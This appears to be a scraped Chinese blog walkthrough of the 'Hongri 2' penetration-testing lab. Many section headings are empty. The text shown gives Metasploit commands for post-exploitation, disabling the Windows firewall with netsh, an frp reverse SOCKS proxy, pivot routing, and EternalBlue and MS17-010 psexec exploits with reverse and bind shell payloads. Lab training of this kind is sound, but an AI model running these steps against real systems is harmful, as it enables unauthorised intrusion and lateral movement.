zoukankan      html  css  js  c++  java
  • 红日靶机二

    信息收集

    失败了  换一个漏洞

    木马上传

    meterpreter > background

    msf5 exploit(multi/handler) >  use post/multi/recon/local_exploit_suggester

    msf5 post(multi/recon/local_exploit_suggester) > set session 1

    msf5 post(multi/recon/local_exploit_suggester) > run

    [*] 192.168.1.128 - Collecting local exploits for java/windows...

    [-] 192.168.1.128 - No suggestions available.

    [*] Post module execution completed

    msf5 post(multi/recon/local_exploit_suggester) >

    迁移进程

    自动迁移进程
    run post/windows/manage/migrate

    提权

    设置心跳

    抓取密码

    进程

    扫描10段端口

    查看用户

    域内信息

    查看防火墙并关闭

    shell netsh firewall show state

    shell netsh advfirewall set allprofiles state off

    横向移动

    伪造票据

    msf

    frp 创建反向socks代理

    修改frps.ini文件

    vim frps.ini

    启动frp

    ./frps -c frps.ini

    修改frpc.ini文件  

    frpc.exe -c frpc.ini

    添加路由

    route add 10.10.10.0 255.255.255.0 1

    route print

    msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010

    msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.10

    msf5 auxiliary(scanner/smb/smb_ms17_010) > run

    尝试利用

    msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.10

    msf5 exploit(windows/smb/ms17_010_eternalblue) > run

    msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec

    msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.10

    rhost => 10.10.10.10

    msf5 exploit(windows/smb/ms17_010_psexec) > set rport 445

    msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/shell/bind_tcp

    payload => windows/x64/shell/bind_tcp

    msf5 exploit(windows/smb/ms17_010_psexec) > run

    学习文章

    https://www.jianshu.com/p/45ad9a534fb4

    https://www.cnblogs.com/R1card0/articles/12960290.html

    http://yugod.xmutsec.com/index.php/2020/07/15/53.html

  • 相关阅读:
    广域网详解
    无线AP和无线路由器区别
    TRUNK的作用功能.什么是TRUNK
    name after, name for, name as
    让你的情商爆棚吧!
    综合布线系统之7个子系统构成
    网桥和交换机的工作原理及区别
    边界网关协议BGP
    OSPF协议详解
    路由信息协议(RIP)的防环机制
  • 原文地址:https://www.cnblogs.com/bingtang123/p/13548971.html
Copyright © 2011-2022 走看看